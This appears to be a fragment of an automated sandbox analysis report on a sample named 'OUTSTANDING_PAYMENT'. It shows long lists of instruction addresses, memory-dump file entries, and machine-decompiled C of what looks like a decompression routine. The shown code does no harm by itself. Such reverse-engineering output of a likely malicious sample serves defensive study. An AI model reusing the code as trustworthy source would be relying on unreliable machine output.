                                                                                                                        0x00406d00
                                                                                                                        0x00406d07
                                                                                                                        0x00000000
                                                                                                                        0x00406d07
                                                                                                                        0x00406cd6
                                                                                                                        0x00406cd9
                                                                                                                        0x00406cde
                                                                                                                        0x00406cde
                                                                                                                        0x00406ce9
                                                                                                                        0x00406cf1
                                                                                                                        0x00406cf4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d39
                                                                                                                        0x00406d3f
                                                                                                                        0x00406d42
                                                                                                                        0x00406d4f
                                                                                                                        0x00406d57
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d0e
                                                                                                                        0x00406d0e
                                                                                                                        0x00406d12
                                                                                                                        0x0040755d
                                                                                                                        0x00000000
                                                                                                                        0x0040755d
                                                                                                                        0x00406d1e
                                                                                                                        0x00406d29
                                                                                                                        0x00406d29
                                                                                                                        0x00406d29
                                                                                                                        0x00406d2c
                                                                                                                        0x00406d2f
                                                                                                                        0x00406d32
                                                                                                                        0x00406d37
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004073ce
                                                                                                                        0x004073ce
                                                                                                                        0x004073d4
                                                                                                                        0x004073da
                                                                                                                        0x004073e0
                                                                                                                        0x004073fa
                                                                                                                        0x004073fd
                                                                                                                        0x00407403
                                                                                                                        0x0040740e
                                                                                                                        0x00407410
                                                                                                                        0x004073e2
                                                                                                                        0x004073e2
                                                                                                                        0x004073f1
                                                                                                                        0x004073f5
                                                                                                                        0x004073f5
                                                                                                                        0x0040741a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d5f
                                                                                                                        0x00406d61
                                                                                                                        0x00406d64
                                                                                                                        0x00406dd5
                                                                                                                        0x00406dd8
                                                                                                                        0x00406ddb
                                                                                                                        0x00406de2
                                                                                                                        0x00406dec
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004073cb
                                                                                                                        0x00406d66
                                                                                                                        0x00406d6a
                                                                                                                        0x00406d6d
                                                                                                                        0x00406d6f
                                                                                                                        0x00406d72
                                                                                                                        0x00406d75
                                                                                                                        0x00406d77
                                                                                                                        0x00406d7a
                                                                                                                        0x00406d7c
                                                                                                                        0x00406d81
                                                                                                                        0x00406d84
                                                                                                                        0x00406d87
                                                                                                                        0x00406d8b
                                                                                                                        0x00406d92
                                                                                                                        0x00406d95
                                                                                                                        0x00406d9c
                                                                                                                        0x00406da0
                                                                                                                        0x00406da8
                                                                                                                        0x00406da8
                                                                                                                        0x00406da8
                                                                                                                        0x00406da2
                                                                                                                        0x00406da2
                                                                                                                        0x00406da2
                                                                                                                        0x00406d97
                                                                                                                        0x00406d97
                                                                                                                        0x00406d97
                                                                                                                        0x00406dac
                                                                                                                        0x00406daf
                                                                                                                        0x00406dcd
                                                                                                                        0x00406dcf
                                                                                                                        0x00000000
                                                                                                                        0x00406db1
                                                                                                                        0x00406db1
                                                                                                                        0x00406db4
                                                                                                                        0x00406db7
                                                                                                                        0x00406dba
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbf
                                                                                                                        0x00406dc2
                                                                                                                        0x00406dc4
                                                                                                                        0x00406dc5
                                                                                                                        0x00406dc8
                                                                                                                        0x00000000
                                                                                                                        0x00406dc8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407068
                                                                                                                        0x0040706c
                                                                                                                        0x0040708f
                                                                                                                        0x00407092
                                                                                                                        0x00407095
                                                                                                                        0x0040709f
                                                                                                                        0x0040706e
                                                                                                                        0x0040706e
                                                                                                                        0x00407071
                                                                                                                        0x00407074
                                                                                                                        0x00407077
                                                                                                                        0x00407084
                                                                                                                        0x00407087
                                                                                                                        0x00407087
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004070ab
                                                                                                                        0x004070af
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070b5
                                                                                                                        0x004070b9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070bf
                                                                                                                        0x004070c1
                                                                                                                        0x004070c5
                                                                                                                        0x004070c5
                                                                                                                        0x004070c8
                                                                                                                        0x004070cc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040711c
                                                                                                                        0x00407120
                                                                                                                        0x00407127
                                                                                                                        0x0040712a
                                                                                                                        0x0040712d
                                                                                                                        0x00407137
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00407122
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407143
                                                                                                                        0x00407147
                                                                                                                        0x0040714e
                                                                                                                        0x00407151
                                                                                                                        0x00407154
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407157
                                                                                                                        0x0040715a
                                                                                                                        0x0040715d
                                                                                                                        0x0040715d
                                                                                                                        0x00407160
                                                                                                                        0x00407163
                                                                                                                        0x00407166
                                                                                                                        0x00407166
                                                                                                                        0x00407169
                                                                                                                        0x00407170
                                                                                                                        0x00407175
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407203
                                                                                                                        0x00407203
                                                                                                                        0x00407207
                                                                                                                        0x004075a5
                                                                                                                        0x00000000
                                                                                                                        0x004075a5
                                                                                                                        0x0040720d
                                                                                                                        0x00407210
                                                                                                                        0x00407213
                                                                                                                        0x00407217
                                                                                                                        0x0040721a
                                                                                                                        0x00407220
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407225
                                                                                                                        0x00407228
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406df8
                                                                                                                        0x00406df8
                                                                                                                        0x00406dfc
                                                                                                                        0x00407569
                                                                                                                        0x00000000
                                                                                                                        0x00407569
                                                                                                                        0x00406e02
                                                                                                                        0x00406e05
                                                                                                                        0x00406e08
                                                                                                                        0x00406e0c
                                                                                                                        0x00406e0f
                                                                                                                        0x00406e15
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e1a
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e20
                                                                                                                        0x00406e23
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e29
                                                                                                                        0x00406e2f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e35
                                                                                                                        0x00406e35
                                                                                                                        0x00406e39
                                                                                                                        0x00406e3c
                                                                                                                        0x00406e3f
                                                                                                                        0x00406e42
                                                                                                                        0x00406e45
                                                                                                                        0x00406e46
                                                                                                                        0x00406e49
                                                                                                                        0x00406e4b
                                                                                                                        0x00406e51
                                                                                                                        0x00406e54
                                                                                                                        0x00406e57
                                                                                                                        0x00406e5a
                                                                                                                        0x00406e5d
                                                                                                                        0x00406e60
                                                                                                                        0x00406e63
                                                                                                                        0x00406e7f
                                                                                                                        0x00406e82
                                                                                                                        0x00406e85
                                                                                                                        0x00406e88
                                                                                                                        0x00406e8f
                                                                                                                        0x00406e93
                                                                                                                        0x00406e95
                                                                                                                        0x00406e99
                                                                                                                        0x00406e65
                                                                                                                        0x00406e65
                                                                                                                        0x00406e69
                                                                                                                        0x00406e71
                                                                                                                        0x00406e76
                                                                                                                        0x00406e78
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e9c
                                                                                                                        0x00406ea3
                                                                                                                        0x00406ea6
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00000000
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb5
                                                                                                                        0x00407575
                                                                                                                        0x00000000
                                                                                                                        0x00407575
                                                                                                                        0x00406ebb
                                                                                                                        0x00406ebe
                                                                                                                        0x00406ec1
                                                                                                                        0x00406ec5
                                                                                                                        0x00406ec8
                                                                                                                        0x00406ece
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed3
                                                                                                                        0x00406ed6
                                                                                                                        0x00406ed6
                                                                                                                        0x00406ed6
                                                                                                                        0x00406edc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406ede
                                                                                                                        0x00406ee1
                                                                                                                        0x00406ee4
                                                                                                                        0x00406ee7
                                                                                                                        0x00406eea
                                                                                                                        0x00406eed
                                                                                                                        0x00406ef0
                                                                                                                        0x00406ef3
                                                                                                                        0x00406ef6
                                                                                                                        0x00406ef9
                                                                                                                        0x00406efc
                                                                                                                        0x00406f14
                                                                                                                        0x00406f17
                                                                                                                        0x00406f1a
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f20
                                                                                                                        0x00406f24
                                                                                                                        0x00406f26
                                                                                                                        0x00406efe
                                                                                                                        0x00406efe
                                                                                                                        0x00406f06
                                                                                                                        0x00406f0b
                                                                                                                        0x00406f0d
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f29
                                                                                                                        0x00406f30
                                                                                                                        0x00406f33
                                                                                                                        0x00000000
                                                                                                                        0x00406f35
                                                                                                                        0x00000000
                                                                                                                        0x00406f35
                                                                                                                        0x00406f33
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406f75
                                                                                                                        0x00406f75
                                                                                                                        0x00406f79
                                                                                                                        0x00407581
                                                                                                                        0x00000000
                                                                                                                        0x00407581
                                                                                                                        0x00406f7f
                                                                                                                        0x00406f82
                                                                                                                        0x00406f85
                                                                                                                        0x00406f89
                                                                                                                        0x00406f8c
                                                                                                                        0x00406f92
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f97
                                                                                                                        0x00406f9a
                                                                                                                        0x00406f9a
                                                                                                                        0x00406fa0
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f41
                                                                                                                        0x00000000
                                                                                                                        0x00406f41
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa5
                                                                                                                        0x00406fa8
                                                                                                                        0x00406fab
                                                                                                                        0x00406fae
                                                                                                                        0x00406fb1
                                                                                                                        0x00406fb4
                                                                                                                        0x00406fb7
                                                                                                                        0x00406fba
                                                                                                                        0x00406fbd
                                                                                                                        0x00406fc0
                                                                                                                        0x00406fd8
                                                                                                                        0x00406fdb
                                                                                                                        0x00406fde
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe4
                                                                                                                        0x00406fe8
                                                                                                                        0x00406fea
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fca
                                                                                                                        0x00406fcf
                                                                                                                        0x00406fd1
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fed
                                                                                                                        0x00406ff4
                                                                                                                        0x00406ff7
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00000000
                                                                                                                        0x00407286
                                                                                                                        0x00407286
                                                                                                                        0x0040728a
                                                                                                                        0x004075b1
                                                                                                                        0x00000000
                                                                                                                        0x004075b1
                                                                                                                        0x00407290
                                                                                                                        0x00407293
                                                                                                                        0x00407296
                                                                                                                        0x0040729a
                                                                                                                        0x0040729d
                                                                                                                        0x004072a3
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407056
                                                                                                                        0x00407056
                                                                                                                        0x00407059
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x00407395
                                                                                                                        0x00407399
                                                                                                                        0x004073bb
                                                                                                                        0x004073be
                                                                                                                        0x004073c8
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x0040739b
                                                                                                                        0x0040739e
                                                                                                                        0x004073a2
                                                                                                                        0x004073a5
                                                                                                                        0x004073a5
                                                                                                                        0x004073a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407452
                                                                                                                        0x00407456
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x0040747b
                                                                                                                        0x00407482
                                                                                                                        0x00407489
                                                                                                                        0x00407489
                                                                                                                        0x00000000
                                                                                                                        0x00407489
                                                                                                                        0x00407458
                                                                                                                        0x0040745b
                                                                                                                        0x0040745e
                                                                                                                        0x00407461
                                                                                                                        0x00407468
                                                                                                                        0x004073ac
                                                                                                                        0x004073ac
                                                                                                                        0x004073af
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407543
                                                                                                                        0x00407546
                                                                                                                        0x00407447
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040717d
                                                                                                                        0x0040717f
                                                                                                                        0x00407186
                                                                                                                        0x00407187
                                                                                                                        0x00407189
                                                                                                                        0x0040718c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407194
                                                                                                                        0x00407197
                                                                                                                        0x0040719a
                                                                                                                        0x0040719c
                                                                                                                        0x0040719e
                                                                                                                        0x0040719e
                                                                                                                        0x0040719f
                                                                                                                        0x004071a2
                                                                                                                        0x004071a9
                                                                                                                        0x004071ac
                                                                                                                        0x004071ba
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407490
                                                                                                                        0x00407490
                                                                                                                        0x00407493
                                                                                                                        0x0040749a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040749f
                                                                                                                        0x0040749f
                                                                                                                        0x004074a3
                                                                                                                        0x004075db
                                                                                                                        0x00000000
                                                                                                                        0x004075db
                                                                                                                        0x004074a9
                                                                                                                        0x004074ac
                                                                                                                        0x004074af
                                                                                                                        0x004074b3
                                                                                                                        0x004074b6
                                                                                                                        0x004074bc
                                                                                                                        0x004074be
                                                                                                                        0x004074be
                                                                                                                        0x004074be
                                                                                                                        0x004074c1
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c7
                                                                                                                        0x004074c7
                                                                                                                        0x004074cb
                                                                                                                        0x0040752b
                                                                                                                        0x0040752e
                                                                                                                        0x00407533
                                                                                                                        0x00407534
                                                                                                                        0x00407536
                                                                                                                        0x00407538
                                                                                                                        0x0040753b
                                                                                                                        0x00407447
                                                                                                                        0x00407447
                                                                                                                        0x00000000
                                                                                                                        0x0040744d
                                                                                                                        0x00407447
                                                                                                                        0x004074cd
                                                                                                                        0x004074d3
                                                                                                                        0x004074d6
                                                                                                                        0x004074d9
                                                                                                                        0x004074dc
                                                                                                                        0x004074df
                                                                                                                        0x004074e2
                                                                                                                        0x004074e5
                                                                                                                        0x004074e8
                                                                                                                        0x004074eb
                                                                                                                        0x004074ee
                                                                                                                        0x00407507
                                                                                                                        0x0040750a
                                                                                                                        0x0040750d
                                                                                                                        0x00407510
                                                                                                                        0x00407514
                                                                                                                        0x00407516
                                                                                                                        0x00407516
                                                                                                                        0x00407517
                                                                                                                        0x0040751a
                                                                                                                        0x004074f0
                                                                                                                        0x004074f0
                                                                                                                        0x004074f8
                                                                                                                        0x004074fd
                                                                                                                        0x004074ff
                                                                                                                        0x00407502
                                                                                                                        0x00407502
                                                                                                                        0x0040751d
                                                                                                                        0x00407524
                                                                                                                        0x00000000
                                                                                                                        0x00407526
                                                                                                                        0x00000000
                                                                                                                        0x00407526
                                                                                                                        0x00000000
                                                                                                                        0x004071c2
                                                                                                                        0x004071c5
                                                                                                                        0x004071fb
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732e
                                                                                                                        0x0040732e
                                                                                                                        0x00407331
                                                                                                                        0x00407333
                                                                                                                        0x004075bd
                                                                                                                        0x00000000
                                                                                                                        0x004075bd
                                                                                                                        0x00407339
                                                                                                                        0x0040733c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407342
                                                                                                                        0x00407346
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00000000
                                                                                                                        0x00407349
                                                                                                                        0x004071c7
                                                                                                                        0x004071c9
                                                                                                                        0x004071cb
                                                                                                                        0x004071cd
                                                                                                                        0x004071d0
                                                                                                                        0x004071d1
                                                                                                                        0x004071d3
                                                                                                                        0x004071d5
                                                                                                                        0x004071d8
                                                                                                                        0x004071db
                                                                                                                        0x004071f1
                                                                                                                        0x004071f6
                                                                                                                        0x0040722e
                                                                                                                        0x0040722e
                                                                                                                        0x00407232
                                                                                                                        0x0040725e
                                                                                                                        0x00407260
                                                                                                                        0x00407267
                                                                                                                        0x0040726a
                                                                                                                        0x0040726d
                                                                                                                        0x0040726d
                                                                                                                        0x00407272
                                                                                                                        0x00407272
                                                                                                                        0x00407274
                                                                                                                        0x00407277
                                                                                                                        0x0040727e
                                                                                                                        0x00407281
                                                                                                                        0x004072ae
                                                                                                                        0x004072ae
                                                                                                                        0x004072b1
                                                                                                                        0x004072b4
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00000000
                                                                                                                        0x00407328
                                                                                                                        0x004072b6
                                                                                                                        0x004072bc
                                                                                                                        0x004072bf
                                                                                                                        0x004072c2
                                                                                                                        0x004072c5
                                                                                                                        0x004072c8
                                                                                                                        0x004072cb
                                                                                                                        0x004072ce
                                                                                                                        0x004072d1
                                                                                                                        0x004072d4
                                                                                                                        0x004072d7
                                                                                                                        0x004072f0
                                                                                                                        0x004072f2
                                                                                                                        0x004072f5
                                                                                                                        0x004072f6
                                                                                                                        0x004072f9
                                                                                                                        0x004072fb
                                                                                                                        0x004072fe
                                                                                                                        0x00407300
                                                                                                                        0x00407302
                                                                                                                        0x00407305
                                                                                                                        0x00407307
                                                                                                                        0x0040730a
                                                                                                                        0x0040730e
                                                                                                                        0x00407310
                                                                                                                        0x00407310
                                                                                                                        0x00407311
                                                                                                                        0x00407314
                                                                                                                        0x00407317
                                                                                                                        0x004072d9
                                                                                                                        0x004072d9
                                                                                                                        0x004072e1
                                                                                                                        0x004072e6
                                                                                                                        0x004072e8
                                                                                                                        0x004072eb
                                                                                                                        0x004072eb
                                                                                                                        0x0040731a
                                                                                                                        0x00407321
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00407321
                                                                                                                        0x00407234
                                                                                                                        0x00407237
                                                                                                                        0x00407239
                                                                                                                        0x0040723c
                                                                                                                        0x0040723f
                                                                                                                        0x00407242
                                                                                                                        0x00407244
                                                                                                                        0x00407247
                                                                                                                        0x0040724a
                                                                                                                        0x0040724a
                                                                                                                        0x0040724d
                                                                                                                        0x0040724d
                                                                                                                        0x00407250
                                                                                                                        0x00407257
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00407257
                                                                                                                        0x004071dd
                                                                                                                        0x004071e0
                                                                                                                        0x004071e2
                                                                                                                        0x004071e5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406f44
                                                                                                                        0x00406f44
                                                                                                                        0x00406f48
                                                                                                                        0x0040758d
                                                                                                                        0x00000000
                                                                                                                        0x0040758d
                                                                                                                        0x00406f4e
                                                                                                                        0x00406f51
                                                                                                                        0x00406f54
                                                                                                                        0x00406f57
                                                                                                                        0x00406f5a
                                                                                                                        0x00406f5d
                                                                                                                        0x00406f60
                                                                                                                        0x00406f62
                                                                                                                        0x00406f65
                                                                                                                        0x00406f68
                                                                                                                        0x00406f6b
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070cf
                                                                                                                        0x004070cf
                                                                                                                        0x004070d3
                                                                                                                        0x00407599
                                                                                                                        0x00000000
                                                                                                                        0x00407599
                                                                                                                        0x004070d9
                                                                                                                        0x004070dc
                                                                                                                        0x004070df
                                                                                                                        0x004070e2
                                                                                                                        0x004070e4
                                                                                                                        0x004070e4
                                                                                                                        0x004070e4
                                                                                                                        0x004070e7
                                                                                                                        0x004070ea
                                                                                                                        0x004070ed
                                                                                                                        0x004070f0
                                                                                                                        0x004070f3
                                                                                                                        0x004070f6
                                                                                                                        0x004070f7
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070fc
                                                                                                                        0x004070ff
                                                                                                                        0x00407102
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407108
                                                                                                                        0x0040710a
                                                                                                                        0x0040710a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x00407350
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407356
                                                                                                                        0x00407359
                                                                                                                        0x0040735c
                                                                                                                        0x0040735f
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407364
                                                                                                                        0x00407367
                                                                                                                        0x0040736a
                                                                                                                        0x0040736d
                                                                                                                        0x00407370
                                                                                                                        0x00407373
                                                                                                                        0x00407374
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407379
                                                                                                                        0x0040737c
                                                                                                                        0x0040737f
                                                                                                                        0x00407382
                                                                                                                        0x00407385
                                                                                                                        0x00407389
                                                                                                                        0x0040738b
                                                                                                                        0x0040738e
                                                                                                                        0x00000000
                                                                                                                        0x00407390
                                                                                                                        0x0040710d
                                                                                                                        0x0040710d
                                                                                                                        0x00000000
                                                                                                                        0x0040710d
                                                                                                                        0x0040738e
                                                                                                                        0x004075c3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406bf2
                                                                                                                        0x004075fa
                                                                                                                        0x004075fa
                                                                                                                        0x00000000
                                                                                                                        0x004075fa
                                                                                                                        0x00407447
                                                                                                                        0x004073ce
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x00407002

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                                                        • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                                                        • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                                                        • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
